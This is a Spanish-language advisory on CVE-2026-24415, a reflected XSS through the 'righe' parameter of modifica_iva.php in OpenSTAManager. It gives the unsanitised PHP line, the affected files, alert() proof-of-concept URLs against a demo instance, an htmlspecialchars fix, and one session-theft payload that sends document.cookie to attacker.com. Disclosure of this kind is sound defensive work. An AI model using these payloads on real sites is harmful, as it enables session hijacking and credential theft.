
CVE-2026-24415 - OpenSTAManager Afectado por XSS en modifica_iva.php a través del parámetro righe
| Campo | Detalles |
|---|---|
| ID CVE | CVE-2026-24415 |
| Gravedad | MEDIA |
| Aviso de seguridad | Ver aviso |
| Descubierto por | Lukasz Rybak |
Múltiples vulnerabilidades de Cross-Site Scripting (XSS) reflejado en OpenSTAManager v2.9.8 permiten a atacantes no autenticados ejecutar código JavaScript arbitrario en el contexto de los navegadores de otros usuarios mediante parámetros de URL manipulados, lo que potencialmente conduce al secuestro de sesiones, al robo de credenciales y a acciones no autorizadas.
Parámetro vulnerable: righe (GET)
OpenSTAManager v2.9.8 contiene múltiples vulnerabilidades de XSS reflejado en los modales de modificación de facturas, pedidos y contratos. La aplicación no sanitiza adecuadamente la entrada proporcionada por el usuario desde el parámetro GET righe antes de reflejarla en la salida HTML.
Ubicación del código vulnerable:
Archivo: /modules/contratti/modals/modifica_iva.php (Línea 125)
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">
El parámetro $_GET['righe'] se inserta directamente en el atributo HTML value sin ningún tipo de sanitización mediante htmlspecialchars() o funciones equivalentes. Esto permite a un atacante salir del contexto del atributo e inyectar HTML/JavaScript arbitrario.
Todos los archivos afectados:
/modules/contratti/modals/modifica_iva.php - Línea 125, Línea 167/modules/preventivi/modals/modifica_iva.php - Línea 125, Línea 167/modules/fatture/modals/modifica_iva.php - Línea 121, Línea 161/modules/ddt/modals/modifica_iva.php - Línea 125, Línea 167/modules/ordini/modals/modifica_iva.php - Línea 125, Línea 167/modules/interventi/modals/modifica_iva.php - Línea 125, Línea 167Requisitos previos:
Paso 1: Iniciar sesión
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Paso 2: Desencadenar el XSS Navega a la siguiente URL en un navegador (o usa curl con cookies):
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>
URLs probadas (todas vulnerables):
https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>Resultado esperado: Una ventana emergente de alerta de JavaScript muestra la cookie de sesión actual, confirmando la ejecución de código.
Salida HTML (verificada en una instancia en vivo):
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">
Verificación:
Payloads alternativos:
Robo de sesión: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
Usuarios afectados: Todos los usuarios autenticados con acceso a los módulos de contratos, facturas, presupuestos o pedidos.
Escenario de ataque:
Corrección recomendada:
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">
Aplica esta corrección a todos los archivos afectados enumerados en la sección Detalles.
Este CVE fue divulgado de forma responsable siguiendo las prácticas de divulgación coordinada de vulnerabilidades. La información proporcionada aquí tiene fines exclusivamente educativos y defensivos.